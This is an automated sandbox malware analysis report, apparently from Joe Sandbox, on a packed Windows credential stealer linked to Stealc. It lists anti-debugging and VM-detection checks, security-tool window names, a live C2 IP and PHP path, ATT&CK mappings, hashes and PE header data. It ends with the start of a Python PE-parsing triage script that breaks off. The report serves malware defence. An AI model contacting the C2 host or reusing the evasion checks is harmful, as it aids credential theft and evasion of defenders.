Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F6DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose | 0_2_00F6DB99
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F6DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose | 0_2_00F6DB80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F74B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA | 0_2_00F74B29
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F74B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose | 0_2_00F74B10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F7D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose | 0_2_00F7D530
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F7DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy | 0_2_00F7DD30
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F616B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA | 0_2_00F616B9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F616A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose | 0_2_00F616A0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F81BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess | 0_2_00F81BF0
Source: file.exe, file.exe, 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1738692638.0000000000AC2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1738692638.0000000000B00000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1738692638.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-25893
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-25884
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-25905
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-25738
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-25757
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

              Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F64A60 VirtualProtect 00000000,00000004,00000100,? | 0_2_00F64A60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F86390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00F86390
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F86390 mov eax, dword ptr fs:[00000030h] | 0_2_00F86390
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F82AD0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA | 0_2_00F82AD0
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

              HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 6640, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F846A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle | 0_2_00F846A0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F84610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle | 0_2_00F84610
Source: file.exe, file.exe, 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: 5Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree | 0_2_00F82D60
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F82B60 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA | 0_2_00F82B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F82A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA | 0_2_00F82A40
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F82C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA | 0_2_00F82C10

              Stealing of Sensitive Information

Source: Yara match | File source: 00000000.00000003.1683174782.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1738692638.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 6640, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

              Remote Access Functionality

Source: Yara match | File source: 00000000.00000003.1683174782.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1738692638.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 6640, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

MITRE ATT&CK Matrix (a number in front of a technique is the count of matched signatures for that technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 2 Command and Scripting Interpreter; 13 Native API; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 1 Create Account; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 1 Masquerading; 33 Virtualization/Sandbox Evasion; 11 Disable or Modify Tools; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 2 System Time Discovery; 641 Security Software Discovery; 33 Virtualization/Sandbox Evasion; 13 Process Discovery; 1 Account Discovery; 1 System Owner/User Discovery; 1 File and Directory Discovery; 324 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 2 Encrypted Channel; 2 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Source | Detection | Scanner | Label | Link
file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
file.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://185.215.113.206/uP | 100% | Avira URL Cloud | malware |
http://185.215.113.206/c4becf79229cb002.php/P | 100% | Avira URL Cloud | malware |
              No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/c4becf79229cb002.php | false | | high
http://185.215.113.206/ | false | | high
185.215.113.206/c4becf79229cb002.php | false | | high
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.206/c4becf79229cb002.phpjfile.exe, 00000000.00000002.1738692638.0000000000AD7000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      http://185.215.113.206/c4becf79229cb002.php/file.exe, 00000000.00000002.1738692638.0000000000AF1000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        http://185.215.113.206/uPfile.exe, 00000000.00000002.1738692638.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://185.215.113.206file.exe, 00000000.00000002.1738692638.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://185.215.113.206/:file.exe, 00000000.00000002.1738692638.0000000000AF1000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            http://185.215.113.206/c4becf79229cb002.php/Pfile.exe, 00000000.00000002.1738692638.0000000000AF1000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            unknown
                            http://185.215.113.206/wsfile.exe, 00000000.00000002.1738692638.0000000000AD7000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://185.215.113.206/c4becf79229cb002.phprfile.exe, 00000000.00000002.1738692638.0000000000AD7000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://185.215.113.206/c4becf79229cb002.phpVfile.exe, 00000000.00000002.1738692638.0000000000AD7000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
                                  IPDomainCountryFlagASNASN NameMalicious
                                  185.215.113.206
                                  unknownPortugal
                                  206894WHOLESALECONNECTIONSNLtrue
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1561557
Start date and time: 2024-11-23 19:00:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 3m 4s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 1
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 79%
• Number of executed functions: 18
• Number of non-executed functions: 121
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: file.exe
No simulations
Context by IP (the "Get hash" and "Browse" link columns of the original table carry no text and are omitted)
Match           | Associated Sample | Detection | Threat Name                                                                          | Context
185.215.113.206 | file.exe          | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc                         | 185.215.113.206/c4becf79229cb002.php
                | file.exe          | malicious | Amadey, Stealc, Vidar                                                                | 185.215.113.206/c4becf79229cb002.php
                | file.exe          | malicious | Stealc                                                                               | 185.215.113.206/c4becf79229cb002.php
                | file.exe          | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar                  | 185.215.113.206/c4becf79229cb002.php
                | file.exe          | malicious | Stealc                                                                               | 185.215.113.206/c4becf79229cb002.php
                | file.exe          | malicious | Stealc                                                                               | 185.215.113.206/c4becf79229cb002.php
                | file.exe          | malicious | Stealc                                                                               | 185.215.113.206/c4becf79229cb002.php
                | file.exe          | malicious | Amadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, Stealc     | 185.215.113.206/c4becf79229cb002.php
                | file.exe          | malicious | Stealc                                                                               | 185.215.113.206/c4becf79229cb002.php
                | file.exe          | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc                         | 185.215.113.206/c4becf79229cb002.php
                                  No context
Context by ASN (link columns omitted as above)
Match                  | Associated Sample | Detection | Threat Name                                                          | Context
WHOLESALECONNECTIONSNL | file.exe          | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc         | 185.215.113.206
                       | file.exe          | malicious | Amadey, Stealc, Vidar                                                | 185.215.113.16
                       | file.exe          | malicious | LummaC Stealer                                                       | 185.215.113.16
                       | file.exe          | malicious | LummaC Stealer                                                       | 185.215.113.16
                       | file.exe          | malicious | Stealc                                                               | 185.215.113.206
                       | file.exe          | malicious | LummaC Stealer                                                       | 185.215.113.16
                       | file.exe          | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar  | 185.215.113.206
                       | file.exe          | malicious | Stealc                                                               | 185.215.113.206
                       | file.exe          | malicious | LummaC Stealer                                                       | 185.215.113.16
                       | file.exe          | malicious | Stealc                                                               | 185.215.113.206
                                  No context
                                  No context
No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.946764198729386
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 1'812'480 bytes
MD5: 2ddf913f1bfac8e658b52ccbd75e8c80
SHA1: f1d0732f7ba49cd0dfee3ea084020e5b75c7ed22
SHA256: 8de92a481031783cdc05d07776627e2294dcb823399b3887e60ce461ff1ecad7
SHA512: ea477fa4c312b5e62aaefde99fd4b647f5f85c60c5c46341986bcd4a8323a5475cc859a3e6eca304a87c1f122176111a64f6c20803cae232566c63232378d0b0
SSDEEP: 49152:PNb0xqGv8NYVthpnAekJ++BwSJ246vETXL/f9:p0xq3grH22SJr/b/
TLSH: A78533E3DEA02B2AE22DC13212DBC36A6ABC42404DDB55EC73854EF58C737D9345749A
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..
Icon Hash: 90cececece8e8eb0
Entrypoint: 0xa97000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 2eabe9054cad5152567f0699947a2c5b
                                  Instruction
                                  jmp 00007FEA18BB3EEAh
                                  jbe 00007FEA18BB3F01h
                                  add byte ptr [eax], al
                                  jmp 00007FEA18BB5EE5h
                                  add byte ptr [ecx], al
                                  add byte ptr [eax], 00000000h
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  adc byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add ecx, dword ptr [edx]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  xor byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  pop ds
                                  add byte ptr [eax+000000FEh], ah
                                  add byte ptr [edx], ah
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [ecx], cl
                                  add byte ptr [eax], 00000000h
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  adc byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add al, 0Ah
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  xor byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], cl
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add dword ptr [eax+00000000h], eax
                                  add byte ptr [eax], al
                                  adc byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add ecx, dword ptr [edx]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  xor byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add dword ptr [eax], eax
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  or byte ptr [eax+00000000h], al
                                  add byte ptr [eax], al
                                  adc byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add cl, byte ptr [edx]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  xor byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  mov byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  Programming Language:
                                  • [C++] VS2010 build 30319
                                  • [ASM] VS2010 build 30319
                                  • [ C ] VS2010 build 30319
                                  • [ C ] VS2008 SP1 build 30729
                                  • [IMP] VS2008 SP1 build 30729
                                  • [LNK] VS2010 build 30319
Data Directories
Name                                 | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IMPORT         | 0x24b04d        | 0x61         | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0x24a000        | 0x2b0        | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0x24b1f8        | 0x8          | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_TLS            | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IAT            | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |
Sections (two sections have an empty name; RWX below abbreviates IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE and RW the same set without IMAGE_SCN_MEM_EXECUTE)
Name      | Virtual Address | Virtual Size | Raw Size | MD5                              | Xored PE | ZLIB Complexity     | File Type            | Entropy            | Characteristics
(unnamed) | 0x1000          | 0x249000     | 0x16200  | 922b22f36999921dce16911bd94bc0fd | unknown  | unknown             | unknown              | unknown            | RWX
.rsrc     | 0x24a000        | 0x2b0        | 0x200    | 4fd86bfbe5ecd32ab317ab6b1dd0abdb | False    | 0.80078125          | data                 | 6.0887747060946245 | RW
.idata    | 0x24b000        | 0x1000       | 0x200    | 0d0399d83a742d5d86c5718841e8e842 | False    | 0.134765625         | data                 | 0.8646718654202081 | RW
(unnamed) | 0x24c000        | 0x2a9000     | 0x200    | 2ff93c1d5f52e2ba65615aebc546723e | unknown  | unknown             | unknown              | unknown            | RWX
imljxmgr  | 0x4f5000        | 0x1a1000     | 0x1a0a00 | e4b7e0823944f199267f81fde77c5d71 | False    | 0.9949059359060906  | data                 | 7.953583121368327  | RWX
joqxgqti  | 0x696000        | 0x1000       | 0x400    | d9a3a3ec1963f95e196e1a835f9507ad | False    | 0.751953125         | data                 | 5.856940687065921  | RWX
.taggant  | 0x697000        | 0x3000       | 0x2200   | 29cd190f377371de6cad818282149481 | False    | 0.08720128676470588 | DOS executable (COM) | 1.1825617174316978 | RWX
Resources
Name        | RVA      | Size  | Type                                   | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x695730 | 0x256 | ASCII text, with CRLF line terminators |          |         | 0.5100334448160535

Imports
DLL          | Import
kernel32.dll | lstrcpy
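The section table and the single kernel32 import above are the static signals behind the "Entry point lies outside standard sections", "PE file contains section with special chars", "Detected unpacking (changes PE section rights)" and "Extensive use of GetProcAddress" verdicts. The following is an added example, not code from Joe Sandbox or from the sample: a standard-library PE32 section-header parser plus the checks a triager runs over it. Because only the header values (names, addresses, sizes, characteristics) are on the page, the input is a constructed header-only image that reproduces those values; raw pointers are laid out contiguously after a 0x1000-byte header, which is an assumption that happens to make the raw sizes sum exactly to the reported file size. Entropy cannot be recomputed without the section bytes, so it is not part of the checks.

```python
"""Added example: parse PE32 section headers and apply static triage checks."""
import struct

# IMAGE_SCN_* characteristic bits from the PE/COFF specification
SCN_CNT_INITIALIZED_DATA = 0x00000040
SCN_MEM_EXECUTE = 0x20000000
SCN_MEM_READ = 0x40000000
SCN_MEM_WRITE = 0x80000000
COMMON_NAMES = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
                ".edata", ".pdata", ".bss", ".tls", ".CRT"}


def build_synthetic_pe(entry_rva, sections, image_base=0x400000, headers_size=0x1000):
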